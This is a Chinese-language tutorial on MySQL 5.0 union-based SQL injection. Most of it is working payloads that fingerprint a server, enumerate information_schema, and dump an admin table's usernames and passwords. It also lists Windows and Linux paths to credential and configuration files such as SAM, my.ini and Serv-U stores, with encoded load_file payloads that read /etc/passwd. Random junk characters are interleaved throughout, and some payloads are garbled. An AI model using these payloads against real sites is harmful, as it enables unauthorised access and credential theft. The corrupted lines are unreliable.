mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。

$ J, @5 L: Z6 y9 X& ~! V; I) V
+ U$ o5 w1 y& _) k2 E; M
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
( l- Y8 \5 T- [3 b5 o: @中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
$ w9 k7 E( V6 Y6 g+ [& Q明。
, L; _, w8 G* h7 O- h1.得到所有数据库名：
|SCHEMATA ->存储数据库名的表
' X! ]" O7 z3 h' A4 I|—字段：SCHEMA_NAME ->数据库名称

|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名
. L" v9 G+ Y9 r# w* ]; o% Q. z
8 C( |3 ]  z( w1 ~( q* {6 S; O|COLUMNS ->存储的字段名表
|—字段：TABLE_SCHEMA ->该字段所属数据库名
3 @% a- t0 M) |: P3 Z) B|—字段：TABLE_NAME ->存储所属表的名称

|—字段：COLUMN_NAME ->该字段的名称
8 m3 V2 ^. c0 b$ F6 m% `2 m/ W; a6 G
* |$ s% _' w( F, j! g: @; ^) q5 \9 }#########################################################################
##
9 }% N) n# n8 y+ Z! S
& |' R# O, N" A2 M- C, Q0×001 获取系统信息:
9 u% E) ]! D0 ]
union select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
  x$ f# t$ ]' o% L
- S+ O4 i" D* L! u2 Y9 X6 B/*
( z# n- k# J% [9 L$ r3 J
@@global.version_compile_os 获取系统版本
0 A+ x+ ]- I0 C  ~8 g
@@datadir 数据库路径
database() 当前数据库名称
0x3c62723e 换行HEX值
1 N: Q" Y* ^# `5 \0 I
*/

/ D$ C8 B, c$ [3 W######################################################################

7 Z" B8 ~1 d+ ?( u! U; a2 q0×002 获取表名
- N; g' y- Y. Y: Y: O
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from
information_schema.tables where table_schema=0x67617264656e /*
4 K' C- W. @+ S( M9 _$ O, d
/*

2 P  a8 n3 {( e; f: Z. w0x67617264656e 为当前数据库名
8 j& b: f; M& W/ p$ |
7 A2 X' y8 B' {8 ^( B1 @  T- j  R! {7 Ggroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名
9 _. e: g2 y4 ^/ h4 F5 V
*/
! L  v1 \5 j4 u1 p
######################################################################

  M7 Y/ H$ d. [1 D8 U0×003 获取字段

, Y9 `8 a) ]9 w9 e) j2 Y2 Yunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from
, S/ P, V$ {( o% a7 ainformation_schema.columns where table_name=0x61646d696e and


7 R  ~6 k# R% ~, X* @4 Mtable_schema=0x67617264656e limit 1 /*

/*
7 @) a/ G) C! G! Y  |! C
/ O0 r8 y* X% ~group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段
! _4 x1 R, T* y  @9 {. _4 O
0x61646d696e ->选择一个表

0x67617264656e ->数据库名
) m( j7 {3 {5 i; C2 C4 Q$ Z2 _
*/
7 D) P( j( f. K+ p; \
, \5 g+ V' Z" c- C#####################################################################
$ I- f2 x- Y  z, G0 ?
' @  K1 @* Q" {. o* C  P0×004 获取数据
6 _; G1 ]4 G+ ^5 v
union select 1,2,3
- Q# S* y% T6 C,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

union select 1,group_concat(id),group_concat(adname),4,5,group_concat
(adpassword),6,7,8 from admin

1 [6 z7 U/ v0 y* U; j/*
) }2 H( Y! @9 ]9 j2 e3 V  ?0 Y
0x3c62723e 换行符号HEX编码

group_concat 同时获得该字段所有数据

& w6 p: F0 L( W*/

0 ]4 j8 I4 ]1 @' A



* u) |& P# n7 D; o$ ^3 q" A顺便添加一些mysql注入时非常有用的一些东西

) m: ^9 p* t0 F2 V1 |简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

% v- j* ?. g$ X/ _: r6 H1:system_user() 系统用户名
$ [; t; U3 p, \- N0 ^+ ?$ f2 {! J2:user()        用户名
3:current_user()  当前用户名
, K+ U4 D5 g" M5 R/ [4:session_user()连接数据库的用户名
* [9 i' o! O/ ~) H/ A5:database()    数据库名
: a: i* Z# X8 k6 ^2 `4 K6 x# X4 b6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
2 s- i# c$ _3 E* Z  F/ O8@datadir     读取数据库路径
9@basedir    MYSQL 安装路径
8 B+ s# {( s( @" Y0 w10@version_compile_os   操作系统  Windows Server 2003,
$ ^9 x9 t* k' X" @收集的一些路径：
0 p0 ^  U5 U6 wWINDOWS下:
c:/boot.ini          //查看系统版本
4 X' P& R/ M% B$ Gc:/windows/php.ini   //php配置信息
4 \) g7 F0 m" F. W# \( hc:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
' w" \% T1 l, {2 s5 A% H% Bc:/winnt/my.ini
) E8 X/ @4 B' k' `0 Fc:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
  P9 E2 m' l" ~3 v) }/ p- {1 J& zc:\Program Files\Serv-U\ServUDaemon.ini
4 i# ~5 F7 Q- r, ]6 X+ P# R% _- o5 Yc:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
9 ^5 n& m, o: j- ?c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
& g: A6 h- D9 @* i7 yC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
5 D) Q( |2 G2 ^/ ~6 d
& ?9 e+ C. f0 X* J; S4 V/ s
! c$ Q( s3 H5 mc:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
: r) d6 u9 n6 e- b4 nC:\Program Files\mysql\my.ini
3 R$ s: U$ A# F4 E) h8 \c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
9 G( {; j2 D" p. uC:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

: x: w/ Z5 W3 }# k; }LUNIX/UNIX下:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
( s( e; Y+ t" D  b& h6 L/usr/local/apache2/conf/httpd.conf
; `% q' w! r  v/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
  D( g  _3 ]6 k% h3 D+ {2 S: G+ J! v5 C/etc/sysconfig/iptables //从中得到防火墙规则策略
0 M8 h5 v% a8 ~0 L9 J; ]/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
3 }7 ~' D" |, U; c' j/etc/my.cnf //mysql的配置文件
# U( _% f# i. ^6 e: @/etc/redhat-release //系统版本
2 v+ Y1 q' a! ?: c% v1 k4 F3 D1 D/etc/issue
) K* x" H# N$ ?0 [3 a9 h  t! s" f/ l/etc/issue.net
* C8 L, r9 y2 f/ w0 r. y8 U5 L/usr/local/app/php5/lib/php.ini //PHP相关设置
" h& f+ \5 U. E+ ~* z- l6 }/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
% _4 x7 n8 a! _/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
  _* L" `8 R* m# Q4 O/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
- c$ K* {1 w# `% E' e/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
! l: i7 L% s* n& cload_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
0 V0 e: W  C* O6 A. ]replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
" w( L  g' ?8 M" E6 M. ?0 ~8 \% j上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

0 Q0 K5 O# \$ p! x) h